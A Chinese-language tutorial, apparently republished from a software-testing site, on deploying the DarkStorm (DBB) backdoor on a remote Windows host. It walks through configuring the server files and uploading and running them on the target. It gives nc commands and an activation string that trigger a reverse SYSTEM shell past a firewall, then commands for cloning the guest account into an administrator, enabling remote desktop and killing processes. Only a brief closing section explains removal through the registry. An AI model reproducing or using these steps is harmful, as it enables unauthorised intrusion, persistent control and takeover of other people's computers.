一、配置后门
第一步当然是把DBB当回家,在使用后门前,请先用压缩包内的config DarkStorm.exe程序配置后门。双击运行config DarkStorm.exe,打开如图1所示的配置对话窗口,根据提示输入相关数据。其实,该后门支持不经过配置就可直接使用,这时将使用后门的默认配置:反向连接端口是8888,关键字是NOIR,服务名是DNScnsvc。
小提示:DBB后门服务端由DarkStorm.exe和DarkStorm.dll组成,这两个exe和DLL文件是可以改名的,但是必须要改成同样的名字,比如,可以把exe文件改名为123.exe,那么dll文件也要相应的改名为123.dll。
二、打开后门
要运行后门很简单,只要将exe和dll文件上传到远程主机上之后,直接运行exe文件,后门即可被加载。
小提示:exe文件和dll文件不必一定要放到system32中,但必须在同一文件夹下。
大家都知道,现在很多情况下主机是在防火墙后面的,如何让后门来逃避防火墙的火眼金睛呢?这就需要用反向连接功能。DBB是通过嗅探激活字符来启动反向连接的,仅支持nc反向连接。
首先在本地计算机中使用nc监听本地计算机的8888端口,进入命令行状态,运行如下命令: nc -l -p 8888。然后再用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....),接着再开一个命令行窗口,运行命令:nc 220.202.242.101 139,然后输入激活命令:NOIR:220.202.242.98:8888。其中220.202.242.101为木马服务端IP地址,NOIR为反弹激活字,220.202.242.98:8888为反向连接的IP地址,也就是本机IP地址及端口。如果反向连接成功,就会在本地计算机中得到目标主机的一个系统权限SHELL(如图2)。
小提示:本地计算机即接受反向SHELL的系统,必须拥有独立公网IP上网的计算机。另外,由于该后门使用的是无驱动的嗅探,无法嗅探本机对本机发起的数据请求,所以在对本机的测试中,是无法成功的。
三、轻松操纵
当成功获取了目标计算机的一个系统权限的SHELL后,就等于已经手握该台计算机的生杀大权。令人更加欣喜的是,DBB还拥有一些非常实用的控制功能。
1.帐户克隆
为了下次能够顺利控制目标计算机,一般的手法就是克隆一个系统权限的帐户,在这里,使用clone命令就可以轻松克隆一个本地用户。其语法格式为:clone username clonename password,其中,username是被克隆的用户的用户名,一般是administrator;clonename是你要克隆为username的用户名,一般是guest;password是你为克隆用户设置的密码,最长32位。例如,要把Guest克隆为管理员帐户,并且设置密码为snow,就只要运行命令:clone administrator guest snow(如图3)。
2.开启终端服务
远程终端服务可以说是最为理想的远程控制方式,因此,当成功入侵目标计算机后,大部分人总是想方设法来开启被控计算机的终端服务。虽然说开启3389终端服务的方法有很多,可都是有一定难度的。不过还好,有了该后门,只要用一条命令就可以轻松开启3389服务,其命令为:term port。例如:运行命令“term 3389”(如图4),这样就将开启目标计算机的端终服务,终端服务通讯端口为3389,重新启动计算机即可生效。
小提示:终端服务只在Windows 2000服务器以上版本才拥有。
3.进程管理
想知道目标计算机运行了哪些程序吗?很简单,运行命令:pslist,这样就可以显示本地所有用户进程和相对应的pid号。如果想结束某一进程的运行,请运行命令:pskill pid,提示:pid指的是进程ID号(如图5)。
另外,还有诸如Logoff(注销当前用户)、Reboot(重启系统)、Shutdown(关闭系统)、Poweroff(关闭电源)等命令可供使用。
四、封杀后门
如果不幸中了该后门,可以通过如下方法来删除。打开注册表编辑器,依次展开如下子键:HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
Services,找到并删除该子键下的DNScnsvc键(如图6),再重新启动系统即可。若服务名是自己设定的,请删除相关服务名的子键。
文章来源于领测软件测试网 https://www.ltesting.net/